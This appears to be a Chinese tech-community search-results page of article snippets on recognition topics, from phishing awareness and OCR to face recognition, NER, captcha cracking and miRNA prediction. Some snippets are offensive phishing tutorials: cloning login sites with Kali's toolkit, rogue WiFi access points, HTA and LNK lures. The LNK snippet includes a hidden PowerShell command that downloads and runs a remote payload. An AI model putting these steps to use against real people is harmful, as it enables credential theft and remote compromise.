首页
学习
活动
专区
圈层
工具
发布
  • 来自专栏公共互联网反网络钓鱼(APCN)

    带你识别和防范钓鱼软件与网站

    三、钓鱼网站主要特点与识别方法通过综合分析钓鱼网站域名、网页内容特点,可以更准确地识别钓鱼网站,并采取相应防范措施保护个人信息和财产安全。 2.诱导行为:钓鱼网站通常会使用“限时优惠”“紧急通知”等诱导性语言或大图浮标,迫使用户快速做出决定,减少思考时间。 2.注意“紧急”或“诱惑性”语言:钓鱼信息通常会使用“立即行动”“账户将被关闭”等催促性语言。 4.定期关注最新钓鱼手法:网络钓鱼技术不断演变,攻击者会利用最新的热点事件和技术进行诈骗。关注网络安全新闻,了解当前流行的钓鱼技术,以快速识别潜在威胁。 (二)学习实用的钓鱼识别技巧1.不要随意点击来自陌生人邮件、社交媒体或者短信中的链接或附件。在访问网站前,仔细检查域名拼写,注意是否有额外的字母、数字或特殊符号。

    1.3K10编辑于 2025-10-10
  • 来自专栏算法工程师的学习日志

    车牌识别2)-搭建车牌识别模型

    上一期分享了模拟生成车牌的方法,今天分享一下搭建要给简单的车牌识别模型,模拟生成车牌的方法参看:车牌识别(1)-车牌数据集生成 生成的车牌如下图 准备数据集,图片放在path下面,同时把图片名称和图片的车牌号对应关系写入到 y_train是长度为7的列表,其中每个都是shape为(n, # )的ndarray,分别对应n张图片的第一个字符,第二个字符....第七个字符 因为车牌是固定长度,所以有个想法,就是既然我们知道识别七次 ,那就可以用七个模型按照顺序识别。 ,识别成功 chars = '' for arg in np.argmax(lic_pred, axis=1): # 取每行中概率值最大的arg,将其转为字符 Lic_pred.append(chars) # 将车牌和识别结果一并存入Lic_pred return Lic_pred

    3.4K30编辑于 2022-07-27
  • 来自专栏Node开发

    NodeJS人脸识别(2)

    上一篇介绍了NodeJS实现人脸识别中的人脸注册,搜索,检测功能。可以看到其实抛开用户量不说,其实任何想要实现的功能最终用NodeJS都是可以实现的。 今天我们来看下SDK文档关于人脸识别其他的接口,我们可以来看看整套人脸识别具体有什么功能,我们可以怎么在实际应用中去进行应用呢? frr_1e-4:万分之一误识率的阈值;frr_1e-3:千分之一误识率的阈值;frr_1e-2:百分之一误识率的阈值。 ;质量检测:返回模糊、光照等质量检测信息,用于辅助判断图片是否符合识别要求; ? 我们先看下测试结果: ? 到这里其实SDK关于人脸识别的所有接口都介绍完毕了。其实还有几个接口,必须账户进行企业实名认证才有权限调用,在这里我就不介绍了。本篇内容到这里差不多结束了。

    2.4K40发布于 2019-06-03
  • 来自专栏Node开发

    图片文字识别(2)

    上篇文章主要对百度AI文字识别接口最基础的通用文字以及手写文字图片进行了接入识别,本篇文章我们来接着看几个实用性比较强的文字识别接口。百度AI接口对接挺容易的,签名加密都没有涉及到。 2.如果图片需要进行保存,可以前端将图片转化为binary格式,后端先将图 片上传到服务器或者直接传到对象存储oss,然后获得图片路径,使用现 在的方法加载缓冲数据,进行BASE64编码最后调用接口解析图片文字信息 首先我们先来看看第一个实用性接口:银行卡照片识别。 银行卡照片识别 这个接口的用处看接口名就可以知道了:识别银行卡并返回卡号、有效期、发卡行和卡片类型。首先我们先看看文档对于接口的具体说明: ? 营业执照识别 顾名思义这个接口就是识别营业执照的照片:可以识别营业执照,并返回关键字段的值,包括单位名称、类型、法人、地址、有效期、证件编号、社会信用代码等。首先一样直接贴下文档请求参数的说明: ? 但是我这里就不准备一一介绍了,有兴趣可以自行查看百度AI文字识别文档: https://ai.baidu.com/docs#/OCR-API/87932804 其实业务开发过程如果适当的引入人脸识别,文字识别

    54.4K30发布于 2019-07-01
  • 来自专栏安恒信息

    邮箱安全第10期 | DMARC-识别并拦截钓鱼邮件

    减少成功的网络钓鱼交付。 在互联网规模工作。 最小化复杂性。

    2.7K71发布于 2018-04-10
  • 来自专栏黑客技术家园

    如何利用kali制作一个“钓鱼”网站,以及如何识别

    鱼叉式网络攻击 网页攻击 传染媒介式 建立payload和listener 邮件群发攻击 Arduino基础攻击 无线接入点攻击 二维码攻击 Powershell攻击 第三反方模块12345678910 我们选择2, Java applet攻击 Metasploit浏览器攻击 钓鱼网站攻击 标签钓鱼攻击 网站jacking攻击 多种网站攻击 全屏幕攻击1234567 这里选择3,钓鱼网站攻击 ? 如果想克隆指定的页面的话,就选择2站点克隆,当然,这个功能虽然强大,但是有的网站是无法克隆的,如果无法克隆,就选择3,自己制作一样的网站去钓鱼。这里我详细讲一下站点克隆的方法。 站点克隆 选择完2之后,需要我们输入一些信息 ? 这个是我们克隆完之后的网站返回的ip地址,一般就写虚拟机的IP地址,然后我们需要填写想要克隆的网站的url ? 总结 大家也可以看到,钓鱼网站的制作其实并不难,所以我们平常在访问一些常用的有账号登陆的地方一定要看清楚url,防止被钓鱼

    8.2K30发布于 2021-04-02
  • 来自专栏自然语言处理

    实体识别(2) -命名实体识别实践CRF

    线性链条件随机场可以用于序列标注等问题,需要解决的命名实体识别(NER)任务正好可通过序列标注方法解决。 训练时,利用训练数据 集通过极大似然估计或正则化的极大似然估计得到条件概率模型p(Y|X); 预测时,对于给定的输入序列x,求出条件概率p(y|x)最大的输出序列y 利用线性链CRF来做实体识别的时候, 该库兼容sklearn的算法,因此可以结合sklearn库的算法设计实体识别系统。sklearn-crfsuite不仅提供了条件随机场的训练和预测方法还提供了评测方法。 sorted_labels, digits=3 )) 参考资料 参考资料 条件随机场CRF及CRF++安装与使用 https://www.biaodianfu.com/crf.html 使用CRF++实现命名实体识别 (NER) https://www.cnblogs.com/jclian91/p/10795413.html 利用crf++进行实体识别 https://www.jianshu.com/p/f5868fdd96d2

    2K20编辑于 2022-03-30
  • 来自专栏公共互联网反网络钓鱼(APCN)

    网络钓鱼攻击特征识别与多维度防御技术研究

    本文基于钓鱼攻击实战特征,围绕识别逻辑、检测模型、代码实现、处置流程与防御体系展开研究,严格遵循技术准确、逻辑严谨、论据闭环原则,聚焦可落地、可验证、可扩展的防御方案,为不同场景用户提供标准化参考。 2 网络钓鱼攻击核心机理与特征2.1 钓鱼攻击定义与本质网络钓鱼(Phishing)是社会工程学与网络技术结合的攻击方式,攻击者伪装成可信实体(机构、平台、联系人),通过邮件、短信、电话、社交平台等渠道发送欺诈信息 UTHSC 安全提示明确指出,钓鱼信息通过情绪诱导促使用户未经思考执行操作,这一特征贯穿所有钓鱼场景,是识别攻击的关键依据。 3.2 文本语义与情感检测技术钓鱼文本具有强意图导向,语义与情感特征稳定,可通过 NLP 实现精准识别。 3.3 页面结构与 DOM 检测技术钓鱼页面为实现窃取目标,DOM 结构存在固定特征,可通过代码解析识别

    30710编辑于 2026-04-03
  • 来自专栏公共互联网反网络钓鱼(APCN)

    多任务处理对员工钓鱼邮件识别能力的影响研究

    摘要本文基于KnowBe4平台近期发布的实证研究数据,结合认知负荷理论与人因安全模型,系统分析多任务工作状态对员工识别钓鱼邮件能力的负面影响。 本文旨在系统探讨多任务状态如何削弱员工对钓鱼邮件的识别能力,分析其背后的心理机制与组织诱因,并基于实证数据提出可操作的缓解措施。 2 文献综述与理论基础2.1 网络钓鱼的人因维度传统网络安全研究多从攻击技术角度切入,但近十年来,人因安全(Human Factors in Security)逐渐成为重要分支。 KnowBe4(2025)的研究首次将该理论应用于钓鱼识别场景。 主要观测指标包括:钓鱼邮件打开率;恶意链接点击率;在仿冒页面输入凭证的比例;对异常信号的自评识别程度(事后问卷)。所有操作均在受控虚拟桌面环境中进行,确保无真实风险。

    21210编辑于 2025-11-06
  • 来自专栏网络安全攻防

    社工钓鱼之WIFI钓鱼

    文章前言 本篇文章我们主要介绍常见的几种WIFI钓鱼方法与具体的实现 钓鱼实践 WiFi-Pumpkin 框架介绍 WiFi-Pumpkin是一款专用于无线环境渗透测试的框架,该工具可以伪造AP以完成中间人攻击 点击界面中的设置,设置钓鱼AP和密码,点击start即可开始 Step 3:点击start后我们可以看到钓鱼WiFi已经开启,连接钓鱼wifi在home界面可以看到当前连接的设备 Step 4:点击 查看帮助说明 常用命令: 简易钓鱼 Step 1:插入无线网卡 Step 2:执行以下命令创建AP #启动框架 wifipumpkin3 #设置无线网卡 set interface wlan0 # Wifiphisher还可用于针对连接的客户端发起受害者定制的网络钓鱼攻击,以获取凭据(例如,来自第三方登录页面或WPA/WPA2预共享密钥)或用恶意软件感染受害者站点。 框架安装 Step 1:下载框架 git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher Step 2:安装依赖

    2.9K10编辑于 2023-08-10
  • 来自专栏公共互联网反网络钓鱼(APCN)

    识别、拦截双攻略”AI时代的钓鱼网站陷阱案例

    当前网络钓鱼呈现AI化趋势,不法分子一方面能够高度仿冒银行、电商、机构等官方客服人员音色和语调,通过电话或语音消息诱导用户放松警惕,进而促使其访问精心伪装的钓鱼网站或泄露敏感信息;另一方面利用AI快速 、批量生成与真实界面高度相似的网站或APP交互页面,诱导用户点击页面,窃取用户重要数据(如社交动态、消费习惯、人际关系、账户信息等),网络钓鱼攻击的成功率和危害性大大增加。 此案暴露了关键防护难点,传统安全软件难以识别AI生成的动态二维码,该事件最终推动防护策略升级。 AI技术驱动的网络钓鱼已演变为全球性重大问题,近年来的典型案例揭示了其核心风险,攻击者通过深度伪造、实时交互及多模态合成技术持续突破传统防御边界。 作者:郭军 中国互联网络信息中心创新业务所编辑:芦笛(公共互联网反网络钓鱼工作组)

    79010编辑于 2025-10-09
  • 来自专栏燧机科技-视频AI智能分析

    河湖禁钓区钓鱼识别监测系统 守护河湖生态

    为提升监管效率,部分水利或城管部门试点部署了“河湖禁钓区钓鱼识别监测系统”。 需强调:AI无法判断“是否属于禁钓区”或“是否使用非法工具”,仅能对岸边可见的疑似钓鱼姿态与动作进行初判,包括:持杆静止:人员手持细长杆状物体,长时间面向水面;抛竿/收线动作:手臂有明显挥动或拉拽轨迹; 系统无法实现:区分“钓鱼”与“拍照自拍杆”“撑伞”“测量仪器”;识别水下网具、电鱼设备等非法捕捞工具;判定该区域是否属于法定禁钓区(需GIS地理围栏联动);二、系统架构:目标检测 + 动作建模 + 边缘推理系统采用三层边缘设计 行为判别层结合OpenPose提取手臂关键点,计算运动矢量;设定规则:若连续满足“手持细长物体 + 面向水面 + 静止 >2分钟”或“有抛竿动作”,则标记为“疑似钓鱼”;引入时间缓冲:避免将短暂驻足游客误判为违规 三、部署优势与现实约束黑光+变焦摄像机可覆盖50~150米岸线,提升单点效率;支持太阳能+4G,适用于无市电的偏远河段;局限性:夜间或雨雾天气下识别率大幅下降;无法识别水中作业或隐蔽捕捞行为;对“一人多竿

    16310编辑于 2026-02-03
  • 来自专栏公共互联网反网络钓鱼(APCN)

    仿冒政府网站钓鱼攻击的识别机制与防御策略研究

    尽管官方IC3平台(www.ic3.gov)明确声明不收取费用、不索取银行信息,且仅使用.gov顶级域,但普通用户仍难以在搜索结果中准确识别真伪。 三、现有防御机制的局限性分析(一)浏览器安全提示不足现代浏览器虽能识别HTTPS与证书有效性,但无法判断网站内容是否合法。 四、多层次防御框架设计针对上述问题,本文提出“识别—验证—干预”三位一体防御框架。 keywords)(二)浏览器扩展:页面哈希比对可开发轻量级Chrome扩展,在访问含“ic3”关键词的页面时自动比对DOM结构:// content.jsconst OFFICIAL_HASH = "a1b2c3d4e5 编辑:芦笛(公共互联网反网络钓鱼工作组)

    31110编辑于 2025-12-21
  • 来自专栏生信修炼手册

    mirdeep2识别novel miRNA

    得益于NGS测序技术和生物信息学的发展,我们可以通过NGS测序数据识别新的miRNA,大大加快了miRNA的研究进程。 mirdeep2这个软件不仅可以对miRNA进行定量,也可以用于识别新的miRNA, 只需要有small RNA文库的测序reads和参考基因组的序列即可,步骤如下 1. 2. 根据reads和基因组比对的结果,预测novel miRNA 基本用法如下 miRDeep2.pl reads.fa genome_fasta reads_vs_genome.arf 软件的操作相当简单 ,代码如下 miRDeep2_core_algorithm.pl dir_tmp/signature.arf dir_tmp/precursors.str -v -50 -l longest_id 执行

    1.7K31发布于 2020-05-08
  • 来自专栏风口上的猪的文章

    机器学习(2) - KNN识别MNIST

    } } Console.WriteLine("准确率: " + accuracy); 对KNN的改进 本文只是对KNN识别 大家可以试着将算法进行改进,例如取K=2或者其他数,或者计算L2距离等。L2距离的结果比L1好一些,可以达到93-94%的正确率。

    73520发布于 2018-09-14
  • 来自专栏网络安全攻防

    社工钓鱼之HTA钓鱼

    钓鱼实践 Step 1:新增listener Step 2:选择"Attacks—>packages—>HTML application" Step 2:选择Powershell,之后点击"Generate 3:保存载荷 Step 4:之后以邮件或者社交软件(例如:QQ、微信)的方式发送给第三方用户,并诱导其进行点击操作 PS:本来想使用ChatGPT来生成一段关于诱导用户点开evil.hta文件的钓鱼话术 Step 5:成功返回会话 文末小结 本篇文章我们介绍了HTA钓鱼的基本流程,在实战中可以通过社交软件或者邮件的方式发送给受害者用户进行执行并获取权限

    1.1K30编辑于 2023-05-12
  • 来自专栏网络安全攻防

    社工钓鱼之LNK钓鱼

    文章前言 LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell 命令 钓鱼实践 Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129:80/a'))" Step 2: Shortcut.Save() Step 4:运行Al1ex.ps1,之后生成LNK文件 Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行 Step 6:之后成功获得Shell 文末小结 基于LNK文件的钓鱼方式总体而言利用难度相对有点大 ,一般都需要通过钓鱼邮件的方式(例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持的方式也还是挺不错的,但是就得看点击率了~

    2.4K20编辑于 2023-05-12
  • 来自专栏四楼没电梯

    java验证码识别--2

    java验证码识别--1 http://blog.csdn.net/problc/article/details/5794460 java验证码识别--2 http://blog.csdn.net/problc /article/details/5797507 java验证码识别--3 http://blog.csdn.net/problc/article/details/5800093 java验证码识别-- /details/5983276 (本文仅用于学习研究图像匹配识别原理,不得用于其他用途。) 识别 因为固定大小,识别跟 验证码识别--1 里面一样,像素比较就可以了。 识别结果如下,识别率100%: 源码: public class ImagePreProcess2 { private static Map<BufferedImage, String> trainMap

    37710编辑于 2024-10-12
  • 领券